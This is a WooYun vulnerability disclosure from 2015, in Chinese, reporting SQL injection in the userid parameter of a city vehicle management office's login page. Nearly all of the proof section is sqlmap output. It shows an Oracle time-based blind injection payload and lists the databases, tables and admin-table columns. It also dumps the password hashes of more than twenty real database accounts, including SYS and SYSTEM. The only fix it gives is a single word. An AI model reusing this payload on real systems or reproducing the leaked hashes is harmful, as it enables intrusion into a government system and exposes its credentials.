当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156478

漏洞标题:某市车管所存在SQL注入造成密码泄露

相关厂商:公安部一所

漏洞作者: Paladin1412

提交时间:2015-11-28 20:22

修复时间:2016-01-13 16:22

公开时间:2016-01-13 16:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-28: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经确认,细节仅向厂商公开
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

如题

详细说明:

哈尔滨车管所地址:**.**.**.**:8080/index.jsp
参数userid可注入造成密码泄露

漏洞证明:

---
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userid=111' AND 1547=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(88)||CHR(78)||CHR(84),5) AND 'BacZ'='BacZ&password=123&jym=4127&imageField.x=65&imageField.y=16
---
back-end DBMS: Oracle
available databases [17]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HRBJTGLJ
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
---
back-end DBMS: Oracle
Database: CGS
[23 tables]
+-------------------------+
| CGS_CZLOG |
| CGS_GONGGAO |
| CGS_HPZLBMB |
| CGS_JCZ |
| CGS_JXKCGX |
| CGS_JXKSRSGX |
| CGS_JXXX |
| CGS_KCXX |
| CGS_MANAGER |
| CGS_USER |
| CGS_YWBLB |
| CGS_YWFLBMB |
| CGS_YWSFB |
| CGS_YWSFBMB |
| CGS_YYJC |
| CGS_YYJCMC |
| CGS_YYKS |
| CGS_YYKSMC |
| DRV_EXAMINATION_SITE |
| IP_LSB |
| SJYZM_SEND_DATA |
| VEH_INSPECTION_LINEINFO |
| YWDMB |
+-------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userid=111' AND 1547=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(88)||CHR(78)||CHR(84),5) AND 'BacZ'='BacZ&password=123&jym=4127&imageField.x=65&imageField.y=16
---
back-end DBMS: Oracle
Database: CGS
Table: CGS_MANAGER
[5 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| JYBH | VARCHAR2 |
| JYMC | VARCHAR2 |
| JYMM | VARCHAR2 |
| JYQX | VARCHAR2 |
| TYPE | CHAR |
+--------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userid=111' AND 1547=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(88)||CHR(78)||CHR(84),5) AND 'BacZ'='BacZ&password=123&jym=4127&imageField.x=65&imageField.y=16
---
back-end DBMS: Oracle
Database: CGS
Table: CGS_MANAGER
[6 entries]
+--------+
| JYBH |
+--------+
| 000002 |
| 111111 |
| 111111 |
| 000002 |
| 000001 |
| 000002 |
+--------+
---
back-end DBMS: Oracle
database management system users password hashes:
[*] ANONYMOUS [1]:
password hash: anonymous
[*] CGS [1]:
password hash: D15999190F363A24
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
password hash: BE318B0ECD3A7D23
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] HRBJTGLJ [1]:
password hash: EDA06A5A4813F069
[*] MDDATA [1]:
password hash: DF02A496267DEE66
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
password hash: F25A184809D6458D
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] PENGCHENG [1]:
password hash: E185CA6A7D4E0BCB
[*] SCOTT [1]:
password hash: F894844C34402B67
[*] SHIHENG [1]:
password hash: 0CB93DD661C7D859
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
password hash: 6F52830C3C3C2E05
[*] SYSMAN [1]:
password hash: EFB1EDCA54911DAB
[*] SYSTEM [1]:
password hash: 1B9DEFE8D64679DC
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
sqlmap resumed the following injection point(s) from stored session:
---

修复方案:

过滤

版权声明:转载请注明来源 Paladin1412@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-11-29 16:20

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评价